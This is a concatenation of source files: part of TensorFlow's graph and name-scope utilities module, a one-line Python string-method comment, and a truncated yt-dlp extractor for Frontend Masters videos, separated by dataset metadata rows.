    tfe.run()
  ```

  Args:
    main: the main function to run.
    argv: the arguments to pass to it.
  """
  enable_eager_execution()
  app.run(main, argv)
@tf_export(v1=["reset_default_graph"])
def reset_default_graph():
  """Clears the default graph stack and resets the global default graph.

  NOTE: The default graph is a property of the current thread, so this
  function applies only to the current thread. Calling it while a
  `tf.compat.v1.Session` or `tf.compat.v1.InteractiveSession` is active
  results in undefined behavior, as does using any previously created
  `tf.Operation` or `tf.Tensor` objects afterwards.

  Raises:
    AssertionError: If this function is called within a nested graph.
  """
  if _default_graph_stack.is_cleared():
    _default_graph_stack.reset()
    return
  raise AssertionError("Do not use tf.reset_default_graph() to clear "
                       "nested graphs. If you need a cleared graph, "
                       "exit the nesting and create a new graph.")
@tf_export(v1=["get_default_graph"])
def get_default_graph():
  """Returns the default graph for the current thread.

  The returned graph is the innermost graph on which a `Graph.as_default()`
  context has been entered, or a global default graph if none has been
  explicitly created.

  NOTE: The default graph is a property of the current thread. A new thread
  that wishes to use the default graph must explicitly enter a
  `with g.as_default():` block in its function.

  Returns:
    The default `Graph` being used in the current thread.
  """
  return _default_graph_stack.get_default()
def has_default_graph():
  """Returns True if at least one graph is on the default graph stack."""
  return bool(_default_graph_stack.stack)
def get_name_scope():
  """Returns the current name scope of the default graph.

  For example:

  ```python
  with tf.name_scope('scope1'):
    with tf.name_scope('scope2'):
      print(tf.get_name_scope())
  ```
  would print the string `scope1/scope2`.

  Returns:
    A string representing the current name scope.
  """
  if not context.executing_eagerly():
    return get_default_graph().get_name_scope()
  # Eager scope names carry a trailing "/"; strip it for display.
  return context.context().scope_name.rstrip("/")
def _assert_same_graph(original_item, item):
"""Fail if the 2 items are from different graphs.
Args:
original_item: Original item to check against.
item: Item to check.
Raises:
ValueError: if graphs do not match.
"""
if original_item.graph is not item.graph:
raise ValueError("%s must be from the same graph as %s." %
(item, original_item))
def _get_graph_from_inputs(op_input_list, graph=None):
  """Returns the appropriate graph to use for the given inputs.

  This library method provides a consistent algorithm for choosing the graph
  in which an Operation should be constructed:

  1. If the default graph is being used to construct a function, we
     use the default graph.
  2. If the "graph" is specified explicitly, we validate that all of the inputs
     in "op_input_list" are compatible with that graph.
  3. Otherwise, we attempt to select a graph from the first Operation-
     or Tensor-valued input in "op_input_list", and validate that all other
     such inputs are in the same graph.
  4. If the graph was not specified and it could not be inferred from
     "op_input_list", we attempt to use the default graph.

  Args:
    op_input_list: A list of inputs to an operation, which may include `Tensor`,
      `Operation`, and other objects that may be converted to a graph element.
    graph: (Optional) The explicit graph to use.

  Raises:
    TypeError: If op_input_list is not a list or tuple, or if graph is not a
      Graph.
    ValueError: If a graph is explicitly passed and not all inputs are from it,
      or if the inputs are from multiple graphs, or we could not find a graph
      and there was no default graph.

  Returns:
    The appropriate graph to use for the given inputs.
  """
  current_default_graph = get_default_graph()
  if current_default_graph.building_function:
    # Case 1: function building always uses the default (function) graph.
    return current_default_graph

  op_input_list = tuple(op_input_list)  # Handle generators correctly
  if graph and not isinstance(graph, Graph):
    raise TypeError("Input graph needs to be a Graph: %s" % graph)

  # 1. We validate that all of the inputs are from the same graph. This is
  #    either the supplied graph parameter, or the first one selected from one
  #    the graph-element-valued inputs. In the latter case, we hold onto
  #    that input in original_graph_element so we can provide a more
  #    informative error if a mismatch is found.
  original_graph_element = None
  for op_input in op_input_list:
    # Determine if this is a valid graph_element.
    # TODO(josh11b): Note that we exclude subclasses of Tensor. Need to clean this
    # up.
    graph_element = None
    if (isinstance(op_input, (Operation, _TensorLike)) and
        ((not isinstance(op_input, Tensor)) or type(op_input) == Tensor)):  # pylint: disable=unidiomatic-typecheck
      graph_element = op_input
    else:
      # May return None if `op_input` is not convertible to a graph element.
      graph_element = _as_graph_element(op_input)

    if graph_element is not None:
      if not graph:
        # First graph element seen determines the candidate graph.
        original_graph_element = graph_element
        graph = graph_element.graph
      elif original_graph_element is not None:
        _assert_same_graph(original_graph_element, graph_element)
      elif graph_element.graph is not graph:
        raise ValueError("%s is not from the passed-in graph." % graph_element)

  # 2. If all else fails, we use the default graph, which is always there.
  return graph or current_default_graph
@tf_export(v1=["GraphKeys"])
class GraphKeys(object):
  """Standard names to use for graph collections.

  The standard library uses various well-known names to collect and
  retrieve values associated with a graph. For example, the
  `tf.Optimizer` subclasses default to optimizing the variables
  collected under `tf.GraphKeys.TRAINABLE_VARIABLES` if none is
  specified, but it is also possible to pass an explicit list of
  variables.

  The following standard keys are defined:

  * `GLOBAL_VARIABLES`: the default collection of `Variable` objects, shared
    across distributed environment (model variables are subset of these). See
    `tf.compat.v1.global_variables`
    for more details.
    Commonly, all `TRAINABLE_VARIABLES` variables will be in `MODEL_VARIABLES`,
    and all `MODEL_VARIABLES` variables will be in `GLOBAL_VARIABLES`.
  * `LOCAL_VARIABLES`: the subset of `Variable` objects that are local to each
    machine. Usually used for temporary variables, like counters.
    Note: use `tf.contrib.framework.local_variable` to add to this collection.
  * `MODEL_VARIABLES`: the subset of `Variable` objects that are used in the
    model for inference (feed forward). Note: use
    `tf.contrib.framework.model_variable` to add to this collection.
  * `TRAINABLE_VARIABLES`: the subset of `Variable` objects that will
    be trained by an optimizer. See
    `tf.compat.v1.trainable_variables`
    for more details.
  * `SUMMARIES`: the summary `Tensor` objects that have been created in the
    graph. See
    `tf.compat.v1.summary.merge_all`
    for more details.
  * `QUEUE_RUNNERS`: the `QueueRunner` objects that are used to
    produce input for a computation. See
    `tf.compat.v1.train.start_queue_runners`
    for more details.
  * `MOVING_AVERAGE_VARIABLES`: the subset of `Variable` objects that will also
    keep moving averages. See
    `tf.compat.v1.moving_average_variables`
    for more details.
  * `REGULARIZATION_LOSSES`: regularization losses collected during graph
    construction.

  The following standard keys are _defined_, but their collections are **not**
  automatically populated as many of the others are:

  * `WEIGHTS`
  * `BIASES`
  * `ACTIVATIONS`
  """

  # Key to collect Variable objects that are global (shared across machines).
  # Default collection for all variables, except local ones.
  GLOBAL_VARIABLES = "variables"
  # Key to collect local variables that are local to the machine and are not
  # saved/restored.
  LOCAL_VARIABLES = "local_variables"
  # Key to collect local variables which are used to accumulate internal state
  # to be used in tf.metrics.*.
  METRIC_VARIABLES = "metric_variables"
  # Key to collect model variables defined by layers.
  MODEL_VARIABLES = "model_variables"
  # Key to collect Variable objects that will be trained by the
  # optimizers.
  TRAINABLE_VARIABLES = "trainable_variables"
  # Key to collect summaries.
  SUMMARIES = "summaries"
  # Key to collect QueueRunners.
  QUEUE_RUNNERS = "queue_runners"
  # Key to collect table initializers.
  TABLE_INITIALIZERS = "table_initializer"
  # Key to collect asset filepaths. An asset represents an external resource
  # like a vocabulary file.
  ASSET_FILEPATHS = "asset_filepaths"
  # Key to collect Variable objects that keep moving averages.
  MOVING_AVERAGE_VARIABLES = "moving_average_variables"
  # Key to collect regularization losses at graph construction.
  REGULARIZATION_LOSSES = "regularization_losses"
  # Key to collect concatenated sharded variables.
  CONCATENATED_VARIABLES = "concatenated_variables"
  # Key to collect savers.
  SAVERS = "savers"
  # Key to collect weights
  WEIGHTS = "weights"
  # Key to collect biases
  BIASES = "biases"
  # Key to collect activations
  ACTIVATIONS = "activations"
  # Key to collect update_ops
  UPDATE_OPS = "update_ops"
  # Key to collect losses
  LOSSES = "losses"
  # Key to collect BaseSaverBuilder.SaveableObject instances for checkpointing.
  SAVEABLE_OBJECTS = "saveable_objects"
  # Key to collect all shared resources used by the graph which need to be
  # initialized once per cluster.
  RESOURCES = "resources"
  # Key to collect all shared resources used in this graph which need to be
  # initialized once per session.
  LOCAL_RESOURCES = "local_resources"
  # Trainable resource-style variables.
  TRAINABLE_RESOURCE_VARIABLES = "trainable_resource_variables"

  # Key to indicate various ops.
  INIT_OP = "init_op"
  LOCAL_INIT_OP = "local_init_op"
  READY_OP = "ready_op"
  READY_FOR_LOCAL_INIT_OP = "ready_for_local_init_op"
  SUMMARY_OP = "summary_op"
  GLOBAL_STEP = "global_step"

  # Used to count the number of evaluations performed during a single evaluation
  # run.
  EVAL_STEP = "eval_step"
  TRAIN_OP = "train_op"

  # Key for control flow context.
  COND_CONTEXT = "cond_context"
  WHILE_CONTEXT = "while_context"

  # Used to store v2 summary names.
  _SUMMARY_COLLECTION = "_SUMMARY_V2"

  # List of all collections that keep track of variables.
  _VARIABLE_COLLECTIONS = [
      GLOBAL_VARIABLES,
      LOCAL_VARIABLES,
      METRIC_VARIABLES,
      MODEL_VARIABLES,
      TRAINABLE_VARIABLES,
      MOVING_AVERAGE_VARIABLES,
      CONCATENATED_VARIABLES,
      TRAINABLE_RESOURCE_VARIABLES,
  ]

  # Key for streaming model ports.
  # NOTE(yuanbyu): internal and experimental.
  _STREAMING_MODEL_PORTS = "streaming_model_ports"

  @decorator_utils.classproperty
  @deprecation.deprecated(None, "Use `tf.GraphKeys.GLOBAL_VARIABLES` instead.")
  def VARIABLES(cls):  # pylint: disable=no-self-argument
    # Deprecated alias kept for backwards compatibility.
    return cls.GLOBAL_VARIABLES
def dismantle_graph(graph):
  """Cleans up reference cycles from a `Graph`.

  Helpful for making sure the garbage collector doesn't need to run after a
  temporary `Graph` is no longer needed.

  Args:
    graph: A `Graph` object to destroy. Neither it nor any of its ops are
      usable after this function runs.
  """
  memory.dismantle_ordered_dict(graph._functions)  # pylint: disable=protected-access

  # Break Operation<->Graph reference cycles by wiping the attribute
  # dictionaries of every op, then of the graph itself.
  for operation in graph.get_operations():
    operation.__dict__ = {}
  graph.__dict__ = {}
@tf_export(v1=["add_to_collection"])
def add_to_collection(name, value):
  """Wrapper for `Graph.add_to_collection()` using the default graph.

  See `tf.Graph.add_to_collection` for more details.

  Args:
    name: The key for the collection. For example, the `GraphKeys` class
      contains many standard names for collections.
    value: The value to add to the collection. @compatibility(eager)
      Collections are only supported in eager when variables are created inside
      an EagerVariableStore (e.g. as part of a layer or template).
      @end_compatibility
  """
  graph = get_default_graph()
  graph.add_to_collection(name, value)
@tf_export(v1=["add_to_collections"])
def add_to_collections(names, value):
  """Wrapper for `Graph.add_to_collections()` using the default graph.

  See `tf.Graph.add_to_collections` for more details.

  Args:
    names: The keys for the collections. The `GraphKeys` class contains many
      standard names for collections.
    value: The value to add to the collections. @compatibility(eager)
      Collections are only supported in eager when variables are created inside
      an EagerVariableStore (e.g. as part of a layer or template).
      @end_compatibility
  """
  graph = get_default_graph()
  graph.add_to_collections(names, value)
@tf_export(v1=["get_collection_ref"])
def get_collection_ref(key):
  """Wrapper for `Graph.get_collection_ref()` using the default graph.

  See `tf.Graph.get_collection_ref` for more details.

  Args:
    key: The key for the collection. For example, the `GraphKeys` class
      contains many standard names for collections.

  Returns:
    The list of values in the collection with the given `name`, or an empty
    list if no value has been added to that collection. Note that this returns
    the collection list itself, which can be modified in place to change the
    collection.

  @compatibility(eager)
  Collections are not supported when eager execution is enabled.
  @end_compatibility
  """
  graph = get_default_graph()
  return graph.get_collection_ref(key)
@tf_export(v1=["get_collection"])
def get_collection(key, scope=None):
  """Wrapper for `Graph.get_collection()` using the default graph.

  See `tf.Graph.get_collection` for more details.

  Args:
    key: The key for the collection. For example, the `GraphKeys` class
      contains many standard names for collections.
    scope: (Optional.) If supplied, the resulting list is filtered to include
      only items whose `name` attribute matches using `re.match`. Items without
      a `name` attribute are never returned if a scope is supplied, and the
      choice of `re.match` means that a `scope` without special tokens filters
      by prefix.

  Returns:
    The list of values in the collection with the given `name`, or an empty
    list if no value has been added to that collection. The list contains the
    values in the order under which they were collected.

  @compatibility(eager)
  Collections are not supported when eager execution is enabled.
  @end_compatibility
  """
  graph = get_default_graph()
  return graph.get_collection(key, scope)
def get_all_collection_keys():
  """Returns a list of collections used in the default graph."""
  graph = get_default_graph()
  return graph.get_all_collection_keys()
def name_scope(name, default_name=None, values=None):
  """Internal-only entry point for `name_scope*`.

  Internal ops do not use the public API and instead rely on
  `ops.name_scope` regardless of the execution mode. This function
  dispatches to the correct `name_scope*` implementation based on
  the arguments provided and the current mode. Specifically,

  * if `values` contains a graph tensor `Graph.name_scope` is used;
  * `name_scope_v1` is used in graph mode;
  * `name_scope_v2` -- in eager mode.

  Args:
    name: The name argument that is passed to the op function.
    default_name: The default name to use if the `name` argument is `None`.
    values: The list of `Tensor` arguments that are passed to the op function.

  Returns:
    `name_scope*` context manager.
  """
  if not context.context().executing_eagerly():
    return internal_name_scope_v1(name, default_name, values)

  if name is None:
    name = default_name
  if values:
    # The presence of a graph tensor in `values` overrides the context.
    # TODO(slebedev): this is Keras-specific and should be removed.
    for value in values:
      if type(value) == Tensor:  # pylint: disable=unidiomatic-typecheck
        return value.graph.name_scope(name)
  return name_scope_v2(name or "")
class internal_name_scope_v1(object):  # pylint: disable=invalid-name
  """Graph-only version of `name_scope_v1`."""

  @property
  def name(self):
    # The resolved scope name (`default_name` when `name` was None).
    return self._name

  def __init__(self, name, default_name=None, values=None):
    """Initialize the context manager.

    Args:
      name: The name argument that is passed to the op function.
      default_name: The default name to use if the `name` argument is `None`.
      values: The list of `Tensor` arguments that are passed to the op function.

    Raises:
      TypeError: if `default_name` is passed in but not a string.
    """
    if not (default_name is None or isinstance(default_name, six.string_types)):
      raise TypeError(
          "`default_name` type (%s) is not a string type. You likely meant to "
          "pass this into the `values` kwarg." % type(default_name))
    self._name = default_name if name is None else name
    self._default_name = default_name
    self._values = values

  def __enter__(self):
    """Start the scope block.

    Returns:
      The scope name.

    Raises:
      ValueError: if neither `name` nor `default_name` is provided
        but `values` are.
    """
    if self._name is None and self._values is not None:
      # We only raise an error if values is not None (provided) because
      # currently tf.name_scope(None) (values=None then) is sometimes used as
      # an idiom to reset to top scope.
      raise ValueError(
          "At least one of name (%s) and default_name (%s) must be provided."
          % (self._name, self._default_name))

    g = get_default_graph()
    if self._values and not g.building_function:
      # Specialize based on the knowledge that `_get_graph_from_inputs()`
      # ignores `inputs` when building a function.
      g_from_inputs = _get_graph_from_inputs(self._values)
      if g_from_inputs is not g:
        # The inputs live on a different graph: make it the default for the
        # duration of this scope, and remember the manager so __exit__ (or
        # the except-branch below) can restore the previous default.
        g = g_from_inputs
        self._g_manager = g.as_default()
        self._g_manager.__enter__()
      else:
        self._g_manager = None
    else:
      self._g_manager = None

    try:
      self._name_scope = g.name_scope(self._name)
      return self._name_scope.__enter__()
    except:
      # Undo the graph switch before re-raising, since __exit__ will not run
      # when __enter__ raises.
      if self._g_manager is not None:
        self._g_manager.__exit__(*sys.exc_info())
      raise

  def __exit__(self, *exc_info):
    # Exit in reverse order of entry: name scope first, then graph manager.
    self._name_scope.__exit__(*exc_info)
    if self._g_manager is not None:
      self._g_manager.__exit__(*exc_info)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["name_scope"])
class name_scope_v1(object):  # pylint: disable=invalid-name
  """A context manager for use when defining a Python op.

  This context manager validates that the given `values` are from the
  same graph, makes that graph the default graph, and pushes a
  name scope in that graph (see `tf.Graph.name_scope` for more details
  on that).

  For example, to define a new Python op called `my_op`:

  ```python
  def my_op(a, b, c, name=None):
    with tf.name_scope(name, "MyOp", [a, b, c]) as scope:
      a = tf.convert_to_tensor(a, name="a")
      b = tf.convert_to_tensor(b, name="b")
      c = tf.convert_to_tensor(c, name="c")
      # Define some computation that uses `a`, `b`, and `c`.
      return foo_op(..., name=scope)
  ```
  """

  def __init__(self, name, default_name=None, values=None):
    """Initialize the context manager.

    Args:
      name: The name argument that is passed to the op function.
      default_name: The default name to use if the `name` argument is `None`.
      values: The list of `Tensor` arguments that are passed to the op function.

    Raises:
      TypeError: if `default_name` is passed in but not a string.
    """
    if name is None:
      self._name = default_name
    else:
      self._name = name
    # Delegate the actual scoping work to the mode-appropriate implementation.
    self._name_scope = name_scope(name, default_name, values)

  @property
  def name(self):
    return self._name

  def __enter__(self):
    return self._name_scope.__enter__()

  def __exit__(self, *exc_info):
    return self._name_scope.__exit__(*exc_info)
def enter_eager_name_scope(ctx, name):
  """Updates the eager context to enter the given name scope.

  Args:
    ctx: The eager context whose `scope_name` is updated in place.
    name: The scope to enter; empty resets to the top scope, and a trailing
      slash marks a fully specified (absolute) scope name.

  Returns:
    A `(new_scope_name, previous_scope_name)` pair.
  """
  previous = ctx.scope_name
  if not name:
    new_scope = ""
  elif name.endswith("/"):
    # A trailing slash breaks out of nested name scopes, indicating a
    # fully specified scope name, for compatibility with Graph.name_scope.
    new_scope = name
  else:
    new_scope = name + "/"
    if previous:
      new_scope = previous + new_scope
  ctx.scope_name = new_scope
  return new_scope, previous
@tf_export("name_scope", v1=[])
class name_scope_v2(object):
  """A context manager for use when defining a Python op.

  This context manager pushes a name scope, which will make the name of all
  operations added within it have a prefix.

  For example, to define a new Python op called `my_op`:

  ```python
  def my_op(a, b, c, name=None):
    with tf.name_scope("MyOp") as scope:
      a = tf.convert_to_tensor(a, name="a")
      b = tf.convert_to_tensor(b, name="b")
      c = tf.convert_to_tensor(c, name="c")
      # Define some computation that uses `a`, `b`, and `c`.
      return foo_op(..., name=scope)
  ```

  When executed, the Tensors `a`, `b`, `c`, will have names `MyOp/a`, `MyOp/b`,
  and `MyOp/c`.

  If the scope name already exists, the name will be made unique by appending
  `_n`. For example, calling `my_op` the second time will generate `MyOp_1/a`,
  etc.
  """

  def __init__(self, name):
    """Initialize the context manager.

    Args:
      name: The prefix to use on all names created within the name scope.

    Raises:
      ValueError: If name is None, or not a string.
    """
    if name is None or not isinstance(name, six.string_types):
      raise ValueError("name for name_scope must be a string.")
    self._name = name
    # Stack of cleanup callables, one per (re-entrant) __enter__.
    self._exit_fns = []

  @property
  def name(self):
    return self._name

  def __enter__(self):
    """Start the scope block.

    Returns:
      The scope name.
    """
    ctx = context.context()
    if not ctx.executing_eagerly():
      graph_scope = get_default_graph().name_scope(self._name)
      entered = graph_scope.__enter__()
      self._exit_fns.append(graph_scope.__exit__)
      return entered
    scope_name, old_scope_name = enter_eager_name_scope(ctx, self._name)
    # `old_scope_name` is captured per-__enter__, so each exit restores the
    # scope that was active when its matching enter ran.
    self._exit_fns.append(
        lambda *a: setattr(ctx, "scope_name", old_scope_name))
    return scope_name

  def __exit__(self, type_arg, value_arg, traceback_arg):
    self._exit_fns.pop()(type_arg, value_arg, traceback_arg)
    return False  # never suppress exceptions
def strip_name_scope(name, export_scope):
  """Removes name scope from a name.

  Args:
    name: A `string` name.
    export_scope: Optional `string`. Name scope to remove.

  Returns:
    Name with name scope removed, or the original name if export_scope
    is None.
  """
  if not export_scope:
    return name
  if export_scope[-1] == "/":
    export_scope = export_scope[:-1]
  try:
    # Strips export_scope/, export_scope///,
    # ^export_scope/, loc:@export_scope/.
    # BUGFIX: re.escape the scope so regex metacharacters that are legal in
    # TF names (e.g. '.') are matched literally instead of as wildcards.
    str_to_replace = r"([\^]|loc:@|^)" + re.escape(export_scope) + r"[\/]+(.*)"
    return re.sub(str_to_replace, r"\1\2", compat.as_str(name), count=1)
  except TypeError as e:
    # If the name is not of a type we can process, simply return it.
    logging.warning(e)
    return name
def prepend_name_scope(name, import_scope):
  """Prepends name scope to a name.

  Args:
    name: A `string` name.
    import_scope: Optional `string`. Name scope to add.

  Returns:
    Name with name scope added, or the original name if import_scope
    is None.
  """
  if not import_scope:
    return name
  # Normalize away a single trailing slash before splicing the scope in.
  scope = import_scope[:-1] if import_scope.endswith("/") else import_scope
  try:
    str_to_replace = r"([\^]|loc:@|^)(.*)"
    return re.sub(str_to_replace, r"\1" + scope + r"/\2",
                  compat.as_str(name))
  except TypeError as e:
    # If the name is not of a type we can process, simply return it.
    logging.warning(e)
    return name
# pylint: disable=g-doc-return-or-yield
# pylint: disable=not-context-manager
@tf_export(v1=["op_scope"])
@tf_contextlib.contextmanager
def op_scope(values, name, default_name=None):
  """DEPRECATED. Same as name_scope above, just different argument order."""
  # Kept only for backwards compatibility; logs a deprecation warning and
  # forwards to name_scope with the modern argument order.
  logging.warn("tf.op_scope(values, name, default_name) is deprecated,"
               " use tf.name_scope(name, default_name, values)")
  with name_scope(name, default_name=default_name, values=values) as scope:
    yield scope
# Maps collection names to (proto_type, to_proto, from_proto) tuples.
_proto_function_registry = registry.Registry("proto functions")
def register_proto_function(collection_name,
                            proto_type=None,
                            to_proto=None,
                            from_proto=None):
  """Registers `to_proto` and `from_proto` functions for collection_name.

  `to_proto` function converts a Python object to the corresponding protocol
  buffer, and returns the protocol buffer.

  `from_proto` function converts protocol buffer into a Python object, and
  returns the object.

  Args:
    collection_name: Name of the collection.
    proto_type: Protobuf type, such as `saver_pb2.SaverDef`,
      `variable_pb2.VariableDef`, `queue_runner_pb2.QueueRunnerDef`.
    to_proto: Function that implements Python object to protobuf conversion.
    from_proto: Function that implements protobuf to Python object conversion.

  Raises:
    TypeError: If `to_proto` or `from_proto` is supplied but not callable.
  """
  # Validate both converters before touching the registry.
  for arg_name, func in (("to_proto", to_proto), ("from_proto", from_proto)):
    if func and not callable(func):
      raise TypeError("%s must be callable." % arg_name)
  _proto_function_registry.register((proto_type, to_proto, from_proto),
                                    collection_name)
def get_collection_proto_type(collection_name):
  """Returns the proto_type for collection_name."""
  try:
    proto_type, _, _ = _proto_function_registry.lookup(collection_name)
  except LookupError:
    return None
  return proto_type
def get_to_proto_function(collection_name):
  """Returns the to_proto function for collection_name."""
  try:
    _, to_proto, _ = _proto_function_registry.lookup(collection_name)
  except LookupError:
    return None
  return to_proto
def get_from_proto_function(collection_name):
  """Returns the from_proto function for collection_name."""
  try:
    _, _, from_proto = _proto_function_registry.lookup(collection_name)
  except LookupError:
    return None
  return from_proto
def _operation_conversion_error(op, dtype=None, name=None, as_ref=False):
"""Produce a nice error if someone converts an Operation to a Tensor."""
raise TypeError(("Can't convert Operation '%s' to Tensor "
"(target dtype=%r, name=%r, as_ref=%r)") %
(op.name, dtype, name, as_ref))
def _op_to_colocate_with(v, graph):
  """Operation object corresponding to v to use for colocation constraints."""
  if v is None:
    return None
  if isinstance(v, Operation):
    return v
  # We always want to colocate with the reference op.
  # When 'v' is a ResourceVariable, the reference op is the handle creating op.
  #
  # What this should be is:
  #   if isinstance(v, ResourceVariable):
  #     return v.handle.op
  # However, that would require a circular import dependency.
  # As of October 2018, there were attempts underway to remove
  # colocation constraints altogether. Assuming that will
  # happen soon, perhaps this hack to work around the circular
  # import dependency is acceptable.
  if hasattr(v, "handle") and hasattr(v.handle, "op") and isinstance(
      v.handle.op, Operation):
    if graph.building_function:
      # Capture the handle into the function graph first so the colocation
      # target belongs to the same graph being built.
      return graph.capture(v.handle).op
    else:
      return v.handle.op
  # Fallback: convert v to a tensor (as a reference) and colocate with the
  # op producing that tensor.
  return internal_convert_to_tensor_or_indexed_slices(v, as_ref=True).op
def _is_keras_symbolic_tensor(x):
return hasattr(x, "graph") and getattr(x.graph, "name", None) == "keras_graph"
# Converting an Operation to a Tensor is always an error; register a
# converter that raises a descriptive TypeError.
tensor_conversion_registry.register_tensor_conversion_function(
    Operation, _operation_conversion_error)

# These symbols were originally defined in this module; import them for
# backwards compatibility until all references have been updated to access
# them from the indexed_slices.py module.
IndexedSlices = indexed_slices.IndexedSlices
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
convert_to_tensor_or_indexed_slices = \
    indexed_slices.convert_to_tensor_or_indexed_slices
convert_n_to_tensor_or_indexed_slices = \
    indexed_slices.convert_n_to_tensor_or_indexed_slices
internal_convert_to_tensor_or_indexed_slices = \
    indexed_slices.internal_convert_to_tensor_or_indexed_slices
internal_convert_n_to_tensor_or_indexed_slices = \
    indexed_slices.internal_convert_n_to_tensor_or_indexed_slices
register_tensor_conversion_function = \
    tensor_conversion_registry.register_tensor_conversion_function
| 36.432153 | 115 | 0.692222 |
f5fdf531191cce59cbcc7728a6e6c256a035ba05 | 91 | py | Python | 30.strings/4.center.py | robinson-1985/python-zero-dnc | df510d67e453611fcd320df1397cdb9ca47fecb8 | [
"MIT"
] | null | null | null | 30.strings/4.center.py | robinson-1985/python-zero-dnc | df510d67e453611fcd320df1397cdb9ca47fecb8 | [
"MIT"
] | null | null | null | 30.strings/4.center.py | robinson-1985/python-zero-dnc | df510d67e453611fcd320df1397cdb9ca47fecb8 | [
"MIT"
] | null | null | null | # 3. center() -> Retorna a string como centro e preenche com espaços o restante do tamanho. | 91 | 91 | 0.747253 |
0d29da29b850a83458cf0e0f1ddbf27e84c72b91 | 8,820 | py | Python | yt_dlp/extractor/frontendmasters.py | michaeljohnm/yt-dlp | 962a5cd9c4e92c3140ae2fe245c0cb0de6e177c7 | [
"Unlicense"
] | 2 | 2022-03-14T15:34:14.000Z | 2022-03-23T17:05:42.000Z | yt_dlp/extractor/frontendmasters.py | michaeljohnm/yt-dlp | 962a5cd9c4e92c3140ae2fe245c0cb0de6e177c7 | [
"Unlicense"
] | null | null | null | yt_dlp/extractor/frontendmasters.py | michaeljohnm/yt-dlp | 962a5cd9c4e92c3140ae2fe245c0cb0de6e177c7 | [
"Unlicense"
] | 1 | 2022-01-03T08:13:27.000Z | 2022-01-03T08:13:27.000Z | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urlparse,
)
from ..utils import (
ExtractorError,
parse_duration,
url_or_none,
urlencode_postdata,
)
class FrontendMastersBaseIE(InfoExtractor):
    """Shared constants and login handling for frontendmasters.com extractors."""
    _API_BASE = 'https://api.frontendmasters.com/v1/kabuki'
    _LOGIN_URL = 'https://frontendmasters.com/login/'

    _NETRC_MACHINE = 'frontendmasters'

    # Named quality levels offered by the API, mapped to video dimensions.
    _QUALITIES = {
        'low': {'width': 480, 'height': 360},
        'mid': {'width': 1280, 'height': 720},
        'high': {'width': 1920, 'height': 1080}
    }

    def _real_initialize(self):
        self._login()

    def _login(self):
        # Log in with the configured credentials; silently no-op when unset.
        (username, password) = self._get_login_info()
        if username is None:
            return

        login_page = self._download_webpage(
            self._LOGIN_URL, None, 'Downloading login page')

        # Carry over any hidden form fields (tokens etc.) from the login page.
        login_form = self._hidden_inputs(login_page)

        login_form.update({
            'username': username,
            'password': password
        })

        post_url = self._search_regex(
            r'<form[^>]+action=(["\'])(?P<url>.+?)\1', login_page,
            'post_url', default=self._LOGIN_URL, group='url')

        if not post_url.startswith('http'):
            post_url = compat_urlparse.urljoin(self._LOGIN_URL, post_url)

        response = self._download_webpage(
            post_url, None, 'Logging in', data=urlencode_postdata(login_form),
            headers={'Content-Type': 'application/x-www-form-urlencoded'})

        # Successful login: the page offers a logout link.
        if any(p in response for p in (
                'wp-login.php?action=logout', '>Logout')):
            return

        # Otherwise, surface the site's error message if one is shown.
        error = self._html_search_regex(
            r'class=(["\'])(?:(?!\1).)*\bMessageAlert\b(?:(?!\1).)*\1[^>]*>(?P<error>[^<]+)<',
            response, 'error message', default=None, group='error')
        if error:
            raise ExtractorError('Unable to login: %s' % error, expected=True)
        raise ExtractorError('Unable to log in')
class FrontendMastersPageBaseIE(FrontendMastersBaseIE):
    """Helpers shared by the lesson-page and course-page extractors."""

    def _download_course(self, course_name, url):
        """Fetch the JSON description of a course from the kabuki API."""
        return self._download_json(
            '%s/courses/%s' % (self._API_BASE, course_name), course_name,
            'Downloading course JSON', headers={'Referer': url})

    @staticmethod
    def _extract_chapters(course):
        """Return the list of chapter titles declared by the course, if any."""
        chapters = []
        lesson_elements = course.get('lessonElements')
        if isinstance(lesson_elements, list):
            chapters = [url_or_none(e) for e in lesson_elements if url_or_none(e)]
        return chapters

    @staticmethod
    def _extract_lesson(chapters, lesson_id, lesson):
        """Build a url_transparent playlist entry for a single lesson dict."""
        title = lesson.get('title') or lesson_id
        display_id = lesson.get('slug')
        description = lesson.get('description')
        thumbnail = lesson.get('thumbnail')

        chapter_number = None
        index = lesson.get('index')
        element_index = lesson.get('elementIndex')
        if (isinstance(index, int) and isinstance(element_index, int)
                and index < element_index):
            chapter_number = element_index - index
        # BUGFIX: chapter_number stays None when index/elementIndex are
        # missing or inconsistent; without the extra truthiness guard,
        # `chapter_number - 1` would raise TypeError on None.
        chapter = (chapters[chapter_number - 1]
                   if chapter_number and chapter_number - 1 < len(chapters)
                   else None)

        duration = None
        timestamp = lesson.get('timestamp')
        if isinstance(timestamp, compat_str):
            # Timestamps look like "0:00:00 - 0:12:34"; duration is the span.
            mobj = re.search(
                r'(?P<start>\d{1,2}:\d{1,2}:\d{1,2})\s*-(?P<end>\s*\d{1,2}:\d{1,2}:\d{1,2})',
                timestamp)
            if mobj:
                duration = parse_duration(mobj.group('end')) - parse_duration(
                    mobj.group('start'))

        return {
            '_type': 'url_transparent',
            'url': 'frontendmasters:%s' % lesson_id,
            'ie_key': FrontendMastersIE.ie_key(),
            'id': lesson_id,
            'display_id': display_id,
            'title': title,
            'description': description,
            'thumbnail': thumbnail,
            'duration': duration,
            'chapter': chapter,
            'chapter_number': chapter_number,
        }
class FrontendMastersIE(FrontendMastersBaseIE):
    """Extractor for a single lesson video, addressed by its API id."""
    _VALID_URL = r'(?:frontendmasters:|https?://api\.frontendmasters\.com/v\d+/kabuki/video/)(?P<id>[^/]+)'
    _TESTS = [{
        'url': 'https://api.frontendmasters.com/v1/kabuki/video/a2qogef6ba',
        'md5': '7f161159710d6b7016a4f4af6fcb05e2',
        'info_dict': {
            'id': 'a2qogef6ba',
            'ext': 'mp4',
            'title': 'a2qogef6ba',
        },
        'skip': 'Requires FrontendMasters account credentials',
    }, {
        'url': 'frontendmasters:a2qogef6ba',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        lesson_id = self._match_id(url)

        source_url = '%s/video/%s/source' % (self._API_BASE, lesson_id)

        formats = []
        # Query the source endpoint once per (container, quality) combination.
        for ext in ('webm', 'mp4'):
            for quality in ('low', 'mid', 'high'):
                resolution = self._QUALITIES[quality].copy()
                format_id = '%s-%s' % (ext, quality)
                # NOTE(review): with fatal=False, _download_json may return
